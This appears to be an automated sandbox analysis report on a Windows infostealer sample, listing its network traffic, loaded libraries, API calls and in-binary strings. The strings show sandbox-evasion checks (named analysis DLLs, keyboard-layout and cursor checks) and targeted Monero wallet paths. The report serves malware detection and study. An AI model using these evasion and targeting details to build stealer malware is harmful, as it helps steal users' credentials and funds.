                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49737 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 65.109.142.154:443 -> 192.168.2.4:49740 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49742 version: TLS 1.2

                          System Summary

                          barindex
                          PE file has a writeable .text section
                          Source: aZm1EZ2IYr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0018145B GetCurrentProcess,NtQueryInformationProcess,0_2_0018145B
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0019C4B70_2_0019C4B7
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_001AD9830_2_001AD983
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_001AD2130_2_001AD213
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0019954F0_2_0019954F
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_001ACD7E0_2_001ACD7E
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_001ADD6B0_2_001ADD6B
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_001AD5B10_2_001AD5B1
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0019B7570_2_0019B757
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: String function: 001847E8 appears 38 times
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: String function: 001905DE appears 71 times
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: String function: 001904BC appears 36 times
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 2220
                          Source: aZm1EZ2IYr.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/11@3/3
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0019147A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_0019147A
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0019196C __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z,__EH_prolog3_catch,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,0_2_0019196C
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199786602107[1].htmJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7336
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeFile created: C:\Users\user\AppData\Local\Temp\delays.tmpJump to behavior
                          Source: aZm1EZ2IYr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: aZm1EZ2IYr.exeReversingLabs: Detection: 73%
                          Source: aZm1EZ2IYr.exeVirustotal: Detection: 60%
                          Source: unknownProcess created: C:\Users\user\Desktop\aZm1EZ2IYr.exe "C:\Users\user\Desktop\aZm1EZ2IYr.exe"
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 2220
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 2384
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00198995 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00198995
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_001AF192 push ecx; ret 0_2_001AF1A5
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_001A2D89 push esi; ret 0_2_001A2D8B
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0019DE05 push ecx; ret 0_2_0019DE18
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00198995 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00198995
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Yara detected AntiVM3
                          Source: Yara matchFile source: aZm1EZ2IYr.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.2.aZm1EZ2IYr.exe.180000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.aZm1EZ2IYr.exe.180000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.1668857258.00000000001B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: aZm1EZ2IYr.exe PID: 7336, type: MEMORYSTR
                          Country aware sample found (crashes after keyboard check)
                          Source: c:\users\user\desktop\azm1ez2iyr.exeEvent Logs and Signature results: Application crash and keyboard check
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                          Source: aZm1EZ2IYr.exeBinary or memory string: DIR_WATCH.DLL
                          Source: aZm1EZ2IYr.exeBinary or memory string: SBIEDLL.DLL
                          Source: aZm1EZ2IYr.exeBinary or memory string: API_LOG.DLL
                          Source: aZm1EZ2IYr.exeBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL23:02:2823:02:2823:02:2823:02:2823:02:2823:02:28DELAYS.TMP%S%SNTDLL.DLL
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,0_2_0018180D
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00190DB0 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00190EC3h0_2_00190DB0
